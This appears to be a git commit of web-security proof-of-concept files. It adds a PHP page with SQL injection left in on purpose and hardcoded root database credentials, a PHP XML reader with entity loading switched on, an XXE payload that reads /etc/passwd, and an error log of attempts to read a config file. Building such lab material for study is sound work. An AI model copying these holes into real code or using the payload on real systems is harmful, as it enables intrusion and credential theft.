Aggiunta PoC

2021-05-01 18:06:01 +02:00 · 2021-05-01 18:06:01 +02:00 · 961a991a5b
parent 046dbef7c8
commit 961a991a5b
4 changed files with 68 additions and 0 deletions
--- a/poc/sqli_example.php
+++ b/poc/sqli_example.php
@ -0,0 +1,35 @@
+<?php
+
+
+if( !isset($_GET['id'])) {
+    echo '
+    <form action="" method="GET">
+        <input type="text" name="id" placeholder="Cerca un cliente tramite ID...">
+        <br>
+        <button type="submit">Cerca anagrafica</button>
+
+    </form>';
+} else {
+    $dblink = mysqli_connect("localhost", "root", "mysql", "osm_master");
+
+    /* If connection fails throw an error */
+
+    if (mysqli_connect_errno()) {
+
+        echo "Could  not connect to database: Error: ".mysqli_connect_error();
+
+        exit();
+    }
+
+    $sqlquery = "SELECT * FROM an_anagrafiche WHERE idanagrafica='".$_GET['id']."'";
+
+    if ($result = mysqli_query($dblink, $sqlquery)) {
+        while ($row = mysqli_fetch_assoc($result)) {
+            echo "#".$row["idanagrafica"]." - ".$row["ragione_sociale"].", ".$row['citta']."<br />";
+        }
+
+        mysqli_free_result($result);
+    }
+
+    mysqli_close($dblink);
+}
--- a/poc/xxe/php_errors.log
+++ b/poc/xxe/php_errors.log
@ -0,0 +1,12 @@
+[23-Dec-2020 16:25:04 Europe/Rome] PHP Warning:  DOMDocument::loadXML(): ParsePI: PI php never end ... in file:///var/www/html/osm_master/config.inc.php, line: 47 in /var/www/html/web_security/xxe/readxml.php on line 6
+[23-Dec-2020 16:25:04 Europe/Rome] PHP Warning:  DOMDocument::loadXML(): Failure to process entity comando in Entity, line: 8 in /var/www/html/web_security/xxe/readxml.php on line 6
+[23-Dec-2020 16:25:04 Europe/Rome] PHP Warning:  DOMDocument::loadXML(): Entity 'comando' not defined in Entity, line: 8 in /var/www/html/web_security/xxe/readxml.php on line 6
+[23-Dec-2020 16:25:04 Europe/Rome] PHP Warning:  simplexml_import_dom(): Invalid Nodetype to import in /var/www/html/web_security/xxe/readxml.php on line 7
+[23-Dec-2020 16:25:04 Europe/Rome] PHP Notice:  Trying to get property 'nome' of non-object in /var/www/html/web_security/xxe/readxml.php on line 10
+[23-Dec-2020 16:25:04 Europe/Rome] PHP Notice:  Trying to get property 'cognome' of non-object in /var/www/html/web_security/xxe/readxml.php on line 12
+[23-Dec-2020 16:25:35 Europe/Rome] PHP Warning:  DOMDocument::loadXML(): ParsePI: PI php never end ... in file:///var/www/html/osm_master/config.inc.php, line: 47 in /var/www/html/web_security/xxe/readxml.php on line 6
+[23-Dec-2020 16:25:35 Europe/Rome] PHP Warning:  DOMDocument::loadXML(): Failure to process entity comando in Entity, line: 8 in /var/www/html/web_security/xxe/readxml.php on line 6
+[23-Dec-2020 16:25:35 Europe/Rome] PHP Warning:  DOMDocument::loadXML(): Entity 'comando' not defined in Entity, line: 8 in /var/www/html/web_security/xxe/readxml.php on line 6
+[23-Dec-2020 16:25:35 Europe/Rome] PHP Warning:  simplexml_import_dom(): Invalid Nodetype to import in /var/www/html/web_security/xxe/readxml.php on line 7
+[23-Dec-2020 16:25:35 Europe/Rome] PHP Notice:  Trying to get property 'nome' of non-object in /var/www/html/web_security/xxe/readxml.php on line 10
+[23-Dec-2020 16:25:35 Europe/Rome] PHP Notice:  Trying to get property 'cognome' of non-object in /var/www/html/web_security/xxe/readxml.php on line 12
--- a/poc/xxe/readxml.php
+++ b/poc/xxe/readxml.php
@ -0,0 +1,12 @@
+<?php
+
+$xml_string = file_get_contents('xxe.xml');
+
+$dom = new DOMDocument();
+$dom->loadXML($xml_string, LIBXML_NOENT | LIBXML_DTDLOAD);
+$xml = simplexml_import_dom($dom);
+
+echo '
+    <b>NOME:</b> '.$xml->nome.
+    '<br>
+    <b>COGNOME</b>: '.$xml->cognome;
--- a/poc/xxe/xxe.xml
+++ b/poc/xxe/xxe.xml
@ -0,0 +1,9 @@
+<?xml version="1.0"?>
+<!DOCTYPE utente [
+<!ELEMENT nome ANY>
+<!ELEMENT cognome ANY>
+<!ENTITY comando SYSTEM "file:///etc/passwd">]>
+<utente>
+    <nome>Mario</nome>
+    <cognome>Rossi &comando;</cognome>
+</utente>